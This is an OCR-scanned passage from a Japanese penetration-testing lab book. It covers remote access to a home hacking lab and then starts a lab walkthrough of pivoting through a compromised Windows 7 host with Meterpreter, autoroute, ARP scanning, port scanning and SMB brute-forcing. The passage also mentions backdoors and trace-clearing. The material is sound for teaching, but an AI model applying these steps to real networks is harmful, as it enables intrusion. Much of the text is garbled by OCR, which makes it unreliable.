Fe Edit View Search Tefminal Help 





10.8 VRDP 接 続 時 の Kali の デス クト ッ プ 
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仮想 マシ ン の 画面 内 と RDP ク ライ アン ト の 画面 が 同期 し て いま す 。 RDP 接続 を 
止め る 場合 に は 、RDP ク ライ アン ト の 「[x] ボタ ン を 押し ます 。 仮想 マシ ン が 終 


「 す る こと は あり ませ ん 。 


3 他 の 端末 か ら VRDP 接続 する 

次 の 実験 と し て 、 LAN 内 の 他 の 端末 か ら Kali に VRDP 接 続 し て み ま す 。 こ こ で 
は iPad に RD Client (6) を 導入 し て 、 この RDP ク ライ アン ト か ら ア クセ ス し て み 
ます 。 接続 PC 名 に 「< ホ スト OS の IP アド レス >:3390」 を 入力 し ます 。 そ の 人 後 、 資 
格 情報 を 入力 し な けれ ば な り ま せん 。 こ れ は ホス ト OS (Windows 10) の ログ イン 
ID と パス ワー ド で す ( 図 10.9)。 


19Z 0.1.11 コ 90 り 
ュー ザー ネネ 


バス ワー ド 


ュー ザー 名 と バ パスワード の 震 存 











図 10-9 資格 情報 の 入力 画面 


*6 : Microsoft が 配布 し て いる RDP ク ライ アン ト の 1 つ で す 。 Windows 10、 Android、iOS、 macOS 
版 が あり ます 
https://docs.microsott.com/ja-jD/ windows-server/remote/remote-desktop-seryices/clients 


remote-desktop- て lients 
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人 力 後に 接続 され 、Kalii の デス クト ッ プ が 表示 され ます ( 図 10-10) 





図 10-10 RD Client に よる Kali の デス クト ッ プ 
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困 se ト アク セス する 


メイ ン PC が ノー ト PC で あれ ば 、 ハ ッ キ ング ・ ラ ボ の 中 核 を 担う 仮想 環境 を 外 
に 持ち 出せ ます 。 し か し 、 メ イン PC が デス クト ッ プ PC で あれ ば 、 持 ち 出 す PC は 
サブ の ノー ト PC に な り ま す 。 ス ペッ ク や デー タ の 二 重 管理 の 問題 か ら 、 そ の サ プ 
の ノー ト PC に ハッ キン グ ・ ラ ボ の 仮想 環境 を 入れ て し まう と 効 率 が 悪 く な っ て し 
まい ます (7)。 そ れ を 解決 する 1 つの 方 法 が 、 出 先 か ら 目 宅 の ハッ キン グ ・ ラ ボ 
に 接続 する こと で す (*8)。 そ れ が で きれ ば 、 サ プ の ノー ト PC に は 仮想 環境 を 入れ 


る 必要 さえ な く な り ま - 


玉 


に この 
ロ 


交 リモ ー ト アフ セス を 実現 する アプ ロー チ 


これ を 実現 する アプ ロー チ は いく つか あり ます が 、 代 表 的 な も の と し て 次 が 挙 
げ ら れ ま す 。 


s ルー ター 笠 四 で RDP 接 続 す る 。 
es VPN で LAN に 接続 する 。 
es Chrome リ モー ト デ ス クト ッ プ で アク セス する 。 


で ルー ター 経由 で RDP 接続 する 
時 
グ 機 能 を 用 いて 、 1 (TCP) へ の アク セス を 、 デ スク トッ プ 
PC に 転送 し ます ( 図 1011) 。 こ れ に より 、 出 先 か ら デ スク トッ プ PC に RDP 接 続 
で きま す 。 後 は 、 そ の 画面 内 で VirtualBox の ゲ ダスト OS を 起動 し た り 、LAN 内 の 
別 の 端末 に リモ ー ト アク セス し た り で きま す 。 


7 : サ プ の ノー ト PC に 仮想 化 ソ フト を 導入 し て お く の は よい が 、 デ スク トッ ププ PC と サ プ の ノー 
ト PC の 両方 に 同じ よう な ゲス ト OS を 入れ て お く の は 無駄 が 多い と い う 意 味 - で す 。 

8: ク ラウ ド 環 境 (AWS、Azure、Google Cloud Plattorm な ど ) に 仮想 マシ ン を 用 意 す る と いう 
アプ ロー チ も あり ます 。 しかしながら 、 初心 者 に と っ て は ハー ド 上 が っ て し まう た め 、 本 書 
で は 省略 し ます 。 続編 を 執筆 する 機会 が あれ ば 、 取 り 上 げた いと 考え て いま す 
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デス クト ッ プ PC 


10-11 ルー ター 経由 で RDP 接 続 する 


し か し 、 い くつ か の デメ リッ ト が あり ます 。 大 き な 問 題 は 、 ル ー タ ー の ポー ト 
3389 を オー プン に する た め 、 狙 われ る 恐れ が ある こと で す 。 ポ ボー ト 番 号 を 変更 す 
れ ば 若 十 安全 に な り ま す が 、 依 然 と し て 狙わ れ 続 け ま す (⑨)。 万 が 一 攻撃 者 に 不 
正 に アク セス され て し まう と 、 ハ ッ キ ング ・ ラ ボ ど ころ か 日 常 で 運用 し て いる メ 
イン PC まで 掌握 され て し まい ます 。 

また 、 出 先 か ら ル ー タ ー の グロ ー バ ル IP ア ドレ ス に アク セス する こと が ネッ ク 
に な り ま す 。 そ の グロ ー バ ル IP ア ドレ ス が 静 的 ITP アド レス で あれ ば 問題 あり ませ 
ん 。 と ころ が 、 通 常 は 動 的 IP アド レス で す C10)。 そ うい っ た 場合 は ダイ ナミ ッ 
ク DNS サー ビス に 登録 し て 、 ホ スト 名 を 取得 し ます 。 こ れ に より 、 ル ー タ ー の グ 
ロー バル IP アド レス が 変わ っ て も 、 そ の ホス ト 名 に アク セス すれ ば ルー ター に 接 
続 で きま す 。 

本 書 で は この アプ ロー チ を 推奨 し な いた め 、 詳 細 は 省略 し ます 。 


@ VPN で LAN に 接続 する 


VPN (Virtual Private Network) と は 、 イ ンタ ーネット 上 に 仮想 的 な プラ イ 
ベー ト な ネッ トワ ー ク を 作る 技術 で す 。 匿 名 化 に 用 いら れる こと が あり ます が 、 


9 : 具体 的 な 設定 方 法 は ルー ター に よっ て 異な り ま す 。 ル ー タ ー で WAN 側 (変換 前 ) の ポー ト 番 
号 を 3389 と は 違う 値 に し て お き 、LAN 側 (変換 後 ) の ポー ト 番 号 を 3389 に し ます 。 つ まり 、 こ 
の 設定 の 場合 は 、 デ スク トッ プ PC の RDP 待 ち 受 け ポ ー ト は 変更 する 必要 が あり ませ ん 。 


*10 : 静 的 IP アド レス で 契約 する に は 、 別 料金 が 発生 する こと が 大 半 で す 。 
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ここ で は 自宅 LAN に 接続 する 方 法 と し て の VPN を 解説 し ます 。 

例え ば 、VPN を 用 いる と 、2 つ の オフ ィ ス の LAN を 接続 し た り 、 出 先 か ら 社 内 
LAN に 接続 し た り で きま す ( 図 10.12)。 つ まり 、 接 続 先 の LAN の IP アド レス が 割 
り 振 られ る の で 、LAN 内 の 端末 に 対し て 自由 に SSH や RDP 接続 で きま す 。 こ の よ 
うに VPN を 活用 すれ ば 、 自 宅 LAN 内 に ある ハッ キン グ ・ ラ ボ に アク セス で きま 
す 。 





デス クト ッ プ PC 


図 10-.12 VPN で LAN に 接続 する 


この アプ ロー チ の 最大 の メリ ッ ト は 、LAN に 属す る の で 和 柔軟 性 が 高い と いう こ 
と で す 。LAN 内 の 任意 の 端末 に リモ ー ト アク セス で きま す 。 

デメ リッ ト も あり ます 。VPN の 設定 は 、 他 の アプ ロー チ に 比べ て 複雑 と いう こ 
と で す 。 ルータ ー の 種類 や LAN の 構成 に よっ て は 、 設 定 の 手間 が さら に 増え ま 
す 。 特に 、 ル ー タ ー の VPN 機 能 で は な く 、 別 端末 で の VPN 機 能 (別途 の VPN サー 
バー や NAS に 備わっ て いる VPN 機 能 ) を 用 いる 場合 が 当て は まり ます 。 そ の と き 
は 、 ル ー タ ー で VPN の 通信 を ボー ト フ ォ ワ リーディング し な けれ ば な り ま せん 。 逆 
に いえ ば 、 こ の アプ ロー チ で 最も シン プル な 構成 に し た けれ ば 、 ル ー タ ー の VPN 
機能 を 用 いる こと に な り ま す 。 

また 、 最 初 の アプ ロー チ と 同様 に 、 静 的 IP サー ビス に 加入 する か 、 ダ イナ ミッ 
ク DNS サー ビス に 登録 する 必要 が あり ます 。 

設定 方 法 は ルー ター の 種類 に よっ て 変わ る た め 解 説 を 省略 し ます が 、 余 裕 が あ 
れ ば 挑戦 し て みて くだ さい 。 
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人 で Chrome リモ ー ト デス クト ッ プ で アク セス する 

Chrome リ モー ト デ ス クト ッ プ と は 、Google が 提供 する リモ ー ト デス クト ッ プ 
で す ("1)。 遠隔 揉 作 され る 側 は 、Chrome リ モー ト デ ス クト ッ プ ホス ト と いう 
サー バー ソフ ト を 導 入 し ます 。 一 方 、 遠隔 操作 する 側 は 、 Chrome の 拡張 機能 で あ 
る Chrome リ モー ト デ ス クト ッ プ を 導入 し ます 。 後 は 、Google アカ ウン ト で 認証 
し て か ら 、PIN (数 字 列 ) を 入力 する だ け で 遠隔 操作 で きま す ( 図 10-13)。 遠 隔 操 
作 す る 側 は 、Chrome が あれ ば よい の で 、 ス マ ホ や タプ ブレ ッ ト で も 構い ませ ん 。 


Google の サー バー 


 / 


デス クト ッ プ PC 





図 10-13 Chrome リモ ー ト デス クト ッ プ で アク セス する 


最大 の メリ ッ ト は 、 面倒 な 設定 な し で リモ ー ト アク セス を 実現 で きる こと で す 。 
ルー ター の 設定 は 不要 に な り ま す C12)。 

また 、 遠 隔 地 か ら リ モー ト ア クセ モス し つつ 、 ホ スト 側 の ロー カル 操作 も 可能 と 
いう 特徴 を 持ち ます (*13)。 つ まり 、 ホ スト 側 の 操作 者 と リモ ー ト アク セス 側 の 操 


*11 : Chrome と 呼び 名 が 付い て いま す が 、Chrome の 起動 中 だ け に 遠隔 抑 作 で きる と いう わけ で 
は あり ませ ん 。 遠隔 操作 され る 側 に お いて OS が 起動 し て いれ ば 、 い つ で も 遠隔 採 作 で きま す 。 


*12: クラ イア ント 端末 と サー バー 端末 は 、 と も に 「Google の 特定 の サー パー に ポー ト 443 と 5222 
(TCP) で 接続 で きる こと 」 と 「UDP で の 外部 接続 が で きる こと 」 が 条件 と な り ま す 。 通常 、 こ 
の 条件 は 満た され ます 。 ル ー タ ー か ら 見 て 外部 か ら 内 部 へ の アク セス は 厳し いで す が 、 内 部 か ら 
外部 へ の アク セス の 制限 は ゆる いか ら で す 。 Chrome リ モー ト デ ス クト ッ プ の サー バー 彰 末 ( 遠 
届 揉 作 さ れる 側 ) は LAN 内 に 存在 し て お り 、 特 殊 な 設定 を し て いな い 限 り 外 部 の Google の サー 
バー に アク セス で きる は ず で す 。 


*13 : RDP 接 続 と は 挙動 が 異な り ま す 。 リ モー ト か ら RDP 接 続 が ある と 、 ロ ー カ ル の モニ ター は 
認証 画面 に な り ま す 。 つ まり 、 リ モー ト あ る い は ロー カル の いずれ か 1 人 し か 操作 で きま せん 。 
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作者 が 同じ 画面 を 見 な が ら 、 同 時 に 操作 で きま す 。 電話 で 指示 し な が ら 、PC 操 作 
を 教え ん る こと も で きる で し ょ う 。 

非常 に 手軽 に ハッ キン グ ・ ラ ボ に アク セス で きる の で 、 本 書 で は この アプ ロー 
チ を お すす めし ます 。 


泡 Chrome リモ ー ト デス フト ッ プ を 導入 する 
Chrome リモート デ スク トッ プ を 実現 する に は 、 次 の 手順 を 実行 し ます 。 


①)Chrome と Chrome リモ ー ト デス クト ッ プ を イン スト ー ル する 

接続 元 (遠隔 操作 する 側 。 ク ライ アン ト と 呼ぶ ) と 接続 先 (遠隔 操作 され る 側 。 
ホス ト と 呼ぶ ) の 両方 で 、Chrome を イン スト ー ル し ます 。 その後 、Chrome ウェ 
プス ト ア か ら 、Chrome リモ ー ト デス クト ッ プ を イン スト ー ル し ます ( 図 10-14) 。 


な Chome リモ ー ト スク トッ ー X 
を - CC | lm 慰 護 され た 退 伝 | https//chrome.googlecomAwebstore/detas/chrome-remote-desktop/gbchcmihmhshidphkhkmpfrmiheniqmpp?hl に ja 凛 | H 


Chrome リモ ー ト デス ク トッ プ ト 二 CHROME に 誠 串 回 8 
Cheoenc Remote Desrop Reieosc M に 3 


MsnngFrs 現下 


六合 証人 
に 1 | レビ ュー 回 凌 ア イィ テム 


5yGocewe 
の お い の 二 ま に S 記 


ご の パソ コン か ら 他 の パソ コン に 、 ま 
た は 和 愉 の バ ソ コン か が から この バ ソ コン 
に 、 イ ンタ ーネット 相 経 由 し て 安全 に 
アク セス で きる よう に な り ま す 。 


Rermote De5 CSp 9Ows2 u26「5 5O 


SS 
や や ドア こす me を 


ShGt trm bd5 計 fCr KCamusrtos och = > 
hoc 「ermOte SuPPO't Or On ermore Iong-terrm 
ら 58513 17 CmOSe PCe22 て O NGLP SpPKSGoCS 
nd fc AlcnnneCiomir are (ulY Securaa. 





図 10-.14 Chrome リモ ー ト デス クト ッ プ の Web ペ ー ジ 
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(②)Chrome リモ ー ト デス クト ッ プ ホス ト を イン スト ー ル する 
ホス ト 側 に て 、Chrome リ モー ト デ ス クト ッ プ の マイ パソ コン か ら 、[「 リ モー ト 
接続 を 有効 に する | ボタ ン を 押し ます ( 図 10-15)。 


IPuslronBgmall com 


[ 訟 | Chrome リモ ー ト デス クト ッ プ 


リモ ー ト サポ ー ト 


リモ ー ト テク ニカ ル サポ ー ト に 最 通 な 、 ユ ー ザ ー 同 士 の 画 較 共 有 。 1 2 HM 


マイ コン ピュ ー タ (5 


生 多 の パソ コン へ の リモ ー ト 投 銘 を 有効 に する に は 、 広 人 旬 と な る パソ コン に Chrome リモ ー ト デス クト 
ゃ ーッ プ を イン スト ー ル し 、[ リ モー ト 拉 桂 を 有効 に する ] を クリ ッ ク し て くだ さい 。 
Chrome リモ ー ト デス クト ッ プ を 使用 し て ご の バル 【 ソ コン に アク セス する mm 
に は 、 リ モー ト 拉 続 を 有効 に する 必要 が あり ます 。 リモ ー ト 結 生 科 克 に する 





図 10-15 [Chrome リモ ー ト デス クト ッ プ 」 画面 


Chrome リ モー ト デ ス クト ッ プ ホス トイ ンス トー ラー の ダウ ン ロ ー ド が 始ま り 
ます 。 ダウンロード 後 に イン スト ー ル し ます 。 

PIN の 入力 を うな が され ます 。 ホ スト 側 は アイ ドル 時 に スリ ー プ に な ら な いよ 
うに 設定 し ます 。 


3 端末 を 接続 する 

クラ イア ント 側 に て 、 Chrome を 起動 し て アド レス バー に chrome://apps を 人 入 
力 し ます 。 ア プリ 一 覧 か ら Chrome リモ ー ト デス クト ッ プ を 選ぶ と 起動 する の で 、 
マイ パソ コン で 接続 し た い ホ スト PC を 選び ます 。 その後 、PIN を 入力 する と リ り 
モー ト ア クセ モス で きま す ( 図 10-16)。 
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OLC の り - に あみ ッッ アス ロロ ピョン レ と と 4 の 
ei リヒ エコ テアン に ジア ルコ ー た たき. 下 





Chmome リモ セー ト デス クト ッ プ を 合用 すず すると. /【 ソ コン ミウ ェ ブ MI で 全 に 志和 で きま す 。 月 胡 す る に ュ 
回 訪 の ユー ザー が Chms リモ ー ト デス クト ッ プ アブ リモ 誠 呈 し て いも め 要 が あり ます 。 こ の アブ リ は 

< の デ RG つっ 入手 で きま すず 。 

コン ザ 王 者 され 、 伯 必 ユ ー ザ ー ザ ご コー の 還 放 必 ザ ニニ 基体 で さそ モ よ 
じ り ま す 隊 同 
ソコ ン の 画 軸 を 黄 は が ら 閣 作 し ます アク セス 


③PIN を 入力 し て 、[ 接 続 ] 
ボタ ン を 押し ます 。 





Chmeme リモ ー! ト デス クト ッ プ を 合同 し て ご CU【 ソ コン に アク セス する 
l 才 因 基 に する 3 
[ 四 莉 1 キー = まま ずる. 析 りか") キキ す 「 等 夫 そ 寺 


図 10-16 端末 に 接続 する 


例え ば 、 Windows 7 か ら Windows 10 に Chrome リモ ー ト デス クト ッ プ で 接続 す 


る と 、 図 10.17 の よう な 画面 に な り ま す 。 





10-17 端末 に 接続 で きた 
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次 に Android 端末 か ら 、Windows 10 に リモ ー ト アク セス し て み ま し た 。 す る 
と 、Windows の デス クト ッ プ が 表示 され まし た ( 図 10-18)。 画面 が 切れ て いま す 3 
が 、 タ ッ チ する こと で 表示 位置 を ずら せま す 。 例え ば 、 ク ライ アン ト 側 で ス 
トメ ニュ ー を ダッ プ す れ ば 、 ホ スト 側 で も スタ ー ト メニ ュー が 開き ます 。 





図 10-.18 Android 端 末 か ら リ モー ト ア クセ ス し た と ころ 


や リ モー ト デ ス クト ッ プ を 切断 する 
を 押し て 切断 し ます 


リモ ー ト の 作業 が 終わ っ た ら 、 右 上 の [X] ボタ ン を 捧 
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無線 LAN ル ー タ ー を 自由 に 置き 換え で き な い ケー ス 


すでに イン ター ネッ ト の 接続 環境 が ある 状況 だ と 、 新 た に 自分 で 無線 LAN ルー 
ター を 用 意 し て も 、 単 純 に ルー ター を 交換 で き な い こと が あり ます 。 例え ば 、 次 
の よう な ケー ス が 挙げ られ ます 。 


* ISP か ら ル ー タ ー 機 能 を 内 蔵 し た モデ ム を レン タル し て いる 。 
s ひか り 電 話 を 契約 し て お り 、 レ ンタ ルル ー タ ー に TP 電話 機能 が 備わっ て いる 。 


最も シン プル な 解決 方 法 は 、 す で に 稼働 し て いる レン タル ルー ター を その まま 
に し て お き (設定 を 変え な い )、 用 意 し た 無線 LAN ル ー タ ー を AP モー ド で LAN 
に 配置 する こと で す 。 レ ンタ ルル ー タ ー は 基本 的 な 機能 を 備え を て いま す が 、 基 本 
的 に は 旧 シ ステ ム な の で 、 市販 され て いる ルー ター と 比べ る と 機能 が 低い と いえ 
ます 。 せ っ か く 用 意 し た 無線 LAN ル ー タ ー の ルー ター 機能 を 活用 で き な い と いう 
デメ リッ ト は あり ます が 、 最 も トラ ブル が な い 解 決 法 と いえ ます 。 

どう し て も 用 意 し た 無線 LAN ルー ター に 置き 換え た い 場 合 に は 、 レ ンタ ルル ー 
ター に て 、 ルー ター 機能 を 無効 化 (ある い は ISP へ の 接続 設定 を 消去 ) し 、PPPoE 
プ ブリッジ 接続 機能 を 有効 に し ます 。 そ し て 、 無 線 LAN ル ー タ ー を 有線 接続 し ま 
す 。 こ こ で 述べ た 方 法 は 基本 的 な 流れ で あり 、 設 定 の 詳細 や 稼働 の 成 合 は レン タ 
ルル ー タ ー に 依存 し ます 。 

VPN を 導入 する 場合 に は より 悩ま し いと いえ ます 。 レ ンタ ルル ー タ ー に も VPN 
サー バー 機能 は 備わっ て いる こと が 多い で す が 、 対 応 し て いる プロ トコ ル が 少な 
か っ た り 、 最 小 限 の 機能 だ っ た り し ます 。 も し 、 用 意 し た 無線 LAN ルー ター に 備 
わっ て いる VPN 機 能 を 活用 し た けれ ば 、 結 局 の と ころ ポー ト フ ォ ワ ー デ ィング 機 
能 や PPPoE ブ リッ ジ 機 能 を 設定 する こと に な り ま す 。 

まだ イン ター ネッ ト を 導入 し て いな い 状 況 で あれ ば 、TP 電話 を 契約 せ ず 、 そ し 
て ルー ター を レン タル じ な い ワ ラン に 加 人 する と と る お ず す めし ます まず 。 こう し て 
お け ば 、 よ り シ ンプ ル に LAN を 構成 で き 、 ネ ットワーク の 設定 の 面 で も 無駄 が あ 
り ま せん 。 ルーター が 2 台 (レン タル ルー ター と 用 意 し た ルー ター) 存在 する と 、 
その 分 の スペ ー ス や 電源 を 確保 する 必要 が ある た めで す 。 
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10 3 ハッ キン グ ・ ラ ボ を より 現実 に 近 つ ける 





本 書 で は 脆弱 サー バー を 仮想 ネッ トワ ー ク に 立ち 上 げ て 、 直 接 接続 し て 攻撃 し 
まし た 。 し か し 、 現 実 の 世界 で は 、 イ ンタ ーネット に 攻撃 対象 の サー バー が 直接 
つなが っ て いる こと は まれ で す 。 ルーター や ファ イア ウォ ー ル (FW) な ど が 存在 
し ます 。 また 、 攻撃 対 象 の ネッ トワ ー ク に は DMZ ("14) が 存在 し 、 さ ら に 内 部 ネッ 
トワ ー ク も 存在 し ます 。 

こう し た ネッ トワ ー ク の 構成 の ギャ ッ プ だ け で は あり ませ ん 。 現実 に 運用 され 
て いる シス テム は 、 有 脆弱 サ ー バ ー よ り は る か に 強固 で す 。 完全 に 脆 能 性 が な いと 
は 言い 切れ ませ ん が 、 本 当 に 脆 弱 性 が ーー は 攻撃 し て みな いと わか ら な いと 
も いえ ます 。 ま た 、 目 分 で 構築 し た 環境 で は な い の で 、 未 知 の シス テム を 手探り 
の 状態 で 調査 し な けれ ば な り ま せん 。 ゴイ ーー ニーーーーー ak 訪 な そる 。 
答え ぇ が ある か どう か 定か で は な いも の を 探る よう な 状況 と いえ 

さら に 、 本 書 で は 管理 者 権限 を 入手 し た り 、 パ スワ ー ド を 入手 し た りす る こと 
を 攻撃 の ゴー ル と し て 設定 し て いま し た 。 し か し 、 現 実に は これ だ け で 済み ませ 
ん 。 管理 者 権限 を 枚 え た と し て も 、 六 跡 を 消し た り 、 次 回 の 侵入 の た め に バッ ク 
ドア を 設け た り 、 興 味 深い ファ イル を 探索 し た り し ます 。 そ し て 、 そ の 端末 を 踏 
み 合 に し て 、 同 一 ネッ トワ リーク に 存在 する 別 の 端末 を 攻撃 し ます 。 

管理 者 権限 を 奪え ば 、 こ うし た こと も 実現 で きま す が 、 攻 撃 の 結果 と し て 管理 
者 権限 を 常に 奪え る と は 限り ませ ん 。 つ まり 、 和 失敗 し た 攻撃 の 痕跡 が 残る わけ で 
す 。 攻撃 に 失敗 し た と し て も 、 攻 撃 を 試み た 事実 は 消え ませ ん 。 つ まり 、 攻 撃 の 
段階 か ら 、 匿 名 化 を 実現 し て いな けれ ば な ら な いと いう こと で す 。 


六 2 つの 側面 の ギャ ッ プ 

第 2 部 で 行っ た ハッ キン グ の 実験 で は 、1 つ の ホス ト オ ン リー ネッ トワ ー ク を 用 
意 し て 、 そ こ に 攻撃 端末 と ター アット 柱 末 夫 胡 す る と いう タツ プル 状況 で し 
た 。 攻撃 手法 の 解説 に 専念 する た め に 、 あ えて そう いっ た ネッ トワ ー ク 構成 に し 
て いま し た ( 図 10-19)。 


14:DMZ と は 非武装 地 否 の こと で あり 、 外 部 (イン ター ネッ ト な ど ) か ら も 内 部 (社内 LAN な 
PP ワー ク の こと で す 。 DMZ に は 、 イ ンタ ーネット に 公開 する サー バー( 例 : 
Web サ ー バ ー) を 配置 し ます 。 遡 に イン ター ネッ ト か ら ア クセ ス さ れ た く な い 端 末 は 内 部 ネッ ト 
ワー ク に 配置 し ます 。 
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ホス ト オ ン リー ネッ トワ ー ク 
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図 10.19 ハッ キン グ の 実験 に お ける ネッ トワ ー ク 構成 


し か し 、 イ ンタ ーネット 上 の ター ゲッ ト 端 末 を ハッ キン グ す る 場合 は 、 そ う 単 
純 に は いき ませ ん 。 特に 、 次 の 2 つの ネッ トワ ー ク の 複雑 性 に つい て 考慮 し な けれ 
ば な ら な いた めで す 。 


IL ターゲット 側 の ネッ トワ ー ク : 一 般 に ネッ トワ ー ク が 多層 化 さ きれ て いる こと を 
考慮 し な けれ ば な ら な い 。 掌握 し た 端末 を 踏み 台 に し て 、 さ ら な る 内 部 ネッ ト 
ワー ク を 狙う 。 

II. 攻撃 側 の ネッ トワ ー ク : 攻撃 の 種類 に よっ て は 、 ル ー タ ー の 存在 を 考慮 し な け 
れ ば な ら な い 。 
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現実 の ハッ キン グ で は 、 図 10.20 の よう な ネッ トワ ー ク 構成 に な り ま す 。 実際 に 
は これ より 複雑 で す が 、 ハ ッ キ ング に お いて は こう し た シン プル な 構成 で 考え る 
と わか りや すい と いえ ます 。 


ター ゲッ ト 端 示 側 
の ネッ トワ ー ク i 





L 






内 部 ネッ トワ ー ク 


1] 


s 出 MacOS ファ イル サー バー 


デ 














図 10-20 現実 の ハッ キン グ に お ける ネッ トワ ー ク 構成 





消 | の ギャ ッ プ を 埋め る 


多層 化 き れ た ター ゲッ ト ネ ッ トワ ー ク を 仮想 に 実現 する わけ で す が 、 最 初 は シ 
ンプ ル に 2 階層 の ネッ トワ ー ク を 構築 し ます 。 そ し て 、 こ の ネッ トワ ー ク に 対す る 
攻撃 を 理解 し た 後 で 、 よ り 現 実 的 な ネッ トワ ー ク 構成 を VirtualBox で 実現 する ヒ 
ント を 紹介 し ます 。 


人 @2 階 層 の ネッ トワ ー ク を 構築 する 


攻撃 端末 は いき な り 奥 深く の ネッ トワ ー ク に は アク セス で きま せん 。 最初 は 攻 
撃 適 末 か ら 見 て 近い ネッ トワ ー ク の 端末 を 掌握 し な けれ ば な り ま せん 。 掌 提 後 は 、 
その 端末 を 踏み 合 に し て 、 ネ ットワーク を 探索 し て 次 な みる ター ゲッ ト を 探し ます 。 
これ を 実現 する に は 一 般 に ネッ トワ ー ク の 知識 が 必要 と な り ま す 。 し か し な が ら 、 
Metasploit の モジ ュー ル を 活用 すれ ば 、 簡 単に 踏み 台 を 経由 で きま す 。 

それ で は 、 仮 想 ネ ットワーク を 構築 し ます 。 こ こ で は 、 ホ スト オン リー ネッ ト 
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ワー ク を 2 つづ 用 意 し ます ( 図 10-21) 。 


VirtualBox Host-Only Ethernet Adapter 


IPv4 アド レス : 10.0.0.1 
IPv4 ネッ トマ スク : 255.255.255.0 


VirtualBox Host-Only Ethernet Adapter #2 


IPv4 アド レス : 10.0.1.1 
IPv4 ネッ トマ スク : 255.255.255.0 





「 VirtualBox Host-Only Ethernet Adapter」 は 第 2 章 で 構成 済み で す 。 「 Virtual 
Box Host-Only Ethernet Adapter #2|] は 追加 し ます 。 
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図 10.21 2 階層 の ホス ト オ ン リー ネッ トワ ー ク 


図 1021 で は 、 ネ ットワーク で 使用 する IP アド レス を 「10000/24] の よう に 
CIDR 表記 で 表現 し て いま す "15) 。CIDR 表記 と は 、IP ア ドレ ス と サブ プ ネ ッ ト マ 
スク を 同時 に 表記 する 方 法 の 1 つ で す 。 ネ ットワーク アド レス は 10000、 サ プ 


*15 : 10000 の ネッ トワ ー ク は クラ ス A に 分 類 さ れる の で 、 本 来 は 10000/8 で す 。 し か し 、 こ れ 
だ と 利用 で きる ネッ トワ ー ク が 少な く な り ま す 。 そ こ で 、10000/24 と し て 、 よ り 多 く の サ プ 
ネッ ト に 分 割 し て いま す 。 
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ネッ トマ スク は 255255.2550 で ある こと を 意味 し ます 。 つま り 、 こ の ネッ トワ ー ク 
内 の 端末 は 100.0.1 一 10.0.0.254 の いずれ か の IP アド レス を 使用 で きま す 。 た だ し 、 
VirtualBox の 仕様 に より 、1000.1 は ホス ト OS が 使用 し ます 。 

3 つの 仮想 マシ ン を 次 の よう に 設定 し ます 。 


仮想 LAN アダ プター1 


割り 当て : ホス ト オ ン リー アダ プター (VirtualBox Host-Only Ethernet Adapter) 
IP アド レス : 静 的 (10.0.0.2) 


仮想 LAN アダ プター1 


割り 当て : ホス ト オ ン リー アダ プター (VirtualBox Host-Only Ethernet Adapter) 
IP アド レス : 静 的 (10.0.0.10) 


仮想 LAN アダ プター2 


割り 当て : ホス ト オ ン リー アダ プター (VirtualBox Host-Only Ethernet Adapter #2) 
IP アド レス : 静 的 (10.0.1.2) 


リバ ー ス シェ ル の ペイ ロー ド を 実行 する 。 
仮想 LAN アダ プター1 


割り 当て : ホス ト オ ン リー アダ プター (VirtualBox Host-Only Ethernet Adapter #2) 
IP アド レス : 静 的 (10.0.1.3) 


ポー ト 445、3389 を 開く 。 


Windows 10 が 最終 的 な 目標 だ っ た と し て も 、Kali は Windows 10 に 直接 アク セ 
ス で きま せん 。Windows 7 に 侵入 し た 後 で あれ ば 、 Windows 7 上 か ら Windows 10 
に アク セス で きま す 。 

ここ で は 、Windows 7 と Kalii で は Meterpreter セ モッ ショ ン を 2 つ 確 立 済 み と し 
ます 。 セッション 番号 1 が ユー ザー 権限 の セッ ショ ン 、 セ ッ シ ョ ン 番 号 2 が UAC 
を 回 避 し て 得 ら れ た 管理 者 権限 の セッ ショ ン と し ます 。 こ の 状況 か ら 、 よ り 内 部 
の ネッ トワ ー ク を 探索 し 、 最 終 的 に Windows 10 に RDP 接 続 す る 方 法 を 紹介 し ま 
す 。 





①Windows 7 の LAN アダ プター の 情報 を 確認 する 
Meterpreter プロ ンプ ト で ijipconfig コマ ンド を 実行 し ます 。 
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Windows 7 の LAN ア ダ プ ター の 情報 が 表示 され ます 。 そ の 中 に ある 仮想 LAN 
アダ プター2 に 別 の ネッ トワ ー ク の IP アド レス (100.1.2) が 割り 当て られ て いる 
こと が わか り ま す 。 


(② セッ ショ ン の ルー ティ ング を 管理 する 

Windows 7 端末 を 踏み 台 に する た め に 準備 し ます 。 自動 ルー ティ ング (post/ 
multi/manage/autoroute") の モジ ュー ル を 用 いて 、 セ モ セッション の ルー ティ ング を 
管理 し ます (16)。 





*16 : msf プ ロン プ ト 上 で route コ マン ド を 使え ば 、 Meterpreter セ ッ シ ョ ン に ルー ト を 追加 で きま 
す 。 こ の と き は Metasploit の 特別 な モジ ュー ル の 実行 は 不要 で す 。 





742 | 第 3 部 | ハッ キン グ ・ ラ ボ の 拡張 


CMD に は デフ ォ ル ト で autoadd が 設定 され て いま す 。 autoadd は 、 ル ー テ ィ ン 
グ テ ー ブ ル と イン ター フェ ー ス の 一 覧 か ら 有 効 な サブネット を 検索 し て 、 自 動 的 
に ルー ト を 追加 し ます 。 こ れ に より 、 各 モジ ュー ル の RHOSTS に 100.1.x を 設定 で 
きま す 。 


③IP アド レス を 検索 する 
ARP ス キャ ナー('"post/windows/gather/arp_scanner ) の モジ ュー ル を 使っ て 、 
100.1x の IP アド レス を 持つ 端末 を 探し ます 。 





この ARP ス キャ ン の 結果 、100.1.3 の 端末 が 存在 する こと が わか り ま す 。 
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(④ ボ ポート スキ ャ ン を する 

次 な る ター ゲッ ト 端 末 の IP アド レス が 判明 し た の で 、 こ こ か ら は これ まで の 
ハッ キン グ と 同様 で す 。 た だ し 、Kali に 用 意 さ きれ た 攻撃 ツー ル に 直接 100.1.3 を 指 
定 で きま せん 。 あ くま で msf プロ ンプ ト 上 で 100.1.3 に 対し て 攻撃 し な けれ ば な り 
ませ ん 。 

この 時 点 で は 、10.0.1.3 の 端末 の OS や 稼働 し て いる サー ビス は 不明 で す 。 そ こ 
で 、msf プ ロン プ ト 上 で ボー トス キャ ン し ます 。 こ こ で は ポ ボート 445 (TCP) と 
3389 (TCP) が 開い て いる か を スキ ャ ン し ます 。 





744 | 第 3 部 | ハッ キン グ ・ ラ ボ の 拡張 





どちら の ボー ト も 開い て いる こと が わか り ま し た 。 前 者 か ら SMB ロ グイ ン 、 後 
者 か ら RDP 接 続 を 試せ ます 。 


⑤ 総 当たり 攻撃 を する 

445 (TCP) が 開い て いる の で 、 ダ イレ クト ホス ティ ング SMB (SMB over TCP/ 
